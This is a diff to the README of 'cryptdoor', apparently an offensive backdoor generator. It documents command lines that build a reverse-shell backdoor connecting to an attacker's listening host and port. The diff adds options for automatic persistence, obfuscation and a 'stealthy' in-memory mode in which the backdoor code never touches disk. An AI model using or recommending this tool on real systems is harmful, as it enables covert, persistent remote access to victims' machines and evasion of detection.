Waflz/cryptdoor/README.md

         ./cryptdoor.py -i host -p port

-You can add a -a to attempt automatic persistence and obfuscation with:
+You can add a -a to attempt automatic persistence and obfuscation with -o:

         ./cryptdoor.py -i host -p port -a -o

+If you want to be extra stealthy and mysterious, never have the backdoor code touch disk with -d:

+        ./cryptdoor.py -i host -p port -d -o

 host and port refer to the host and port of the listening server (attacker).
 These are the options you have from within the shell: